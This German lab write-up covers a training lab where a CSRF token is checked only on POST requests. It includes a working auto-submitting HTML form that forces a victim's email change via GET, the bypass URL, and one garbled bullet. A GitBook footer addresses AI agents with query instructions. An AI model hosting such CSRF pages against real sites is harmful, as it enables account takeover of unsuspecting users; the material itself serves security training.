> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/csrf/csrf-token-validation-depends-on-http-method.md).

# CSRF mit Token-Validierung basierend auf der HTTP-Methode

### CSRF, bei dem die Token-Validierung von der Anfragemethode abhängt

#### Laborkontext

Die Funktion zum Ändern der E-Mail-Adresse ist anfällig für einen CSRF-Angriff. Es ist eine Schutzmaßnahme vorhanden, sie wird jedoch nur auf bestimmte Arten von Anfragen angewendet. Ziel: Eine Seite auf dem Exploit-Server hosten, die das Opfer dazu zwingt, seine E-Mail-Adresse zu ändern. / Für Tests bereitgestellte Zugangsdaten: `wiener:peter`.

#### Feststellung

* Ein CSRF-Token wird geprüft für **POST** Anfragen.

<figure><img src="/files/3b7b47670292869a3ae1e5a6c4a37a534a2eab0b" alt=""><figcaption></figcaption></figure>

* Dieselbe Aktion akzeptiert in **GET** \*\*n
* Betroffener Punkt: `/my-account/change-email`.

<figure><img src="/files/f14196df570479a2f6ce67a32876e5df17817573" alt=""><figcaption></figcaption></figure>

Auf dem Server wird eine Seite gehostet, die automatisch eine **GET** Anfrage an den Endpunkt zum Ändern der E-Mail-Adresse sendet:

```html
<form class="login-form" name="change-email-form" action="https://0a72007c0337ccb880ed1c9b00fa00d1.web-security-academy.net/my-account/change-email" method="GET">
           <input required="" type="email" name="email" value="Hacked@byjordan.com">
</form>

<script>
   document.forms[0].submit();
</script>
```

Die folgende URL veranschaulicht die Umgehung (kein Token in GET erforderlich)

```html
/my-account/change-email?email=test%40test.com
```

<figure><img src="/files/300dbc1eecc6f3aebde319dec6fe261af7b3e53c" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/csrf/csrf-token-validation-depends-on-http-method.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
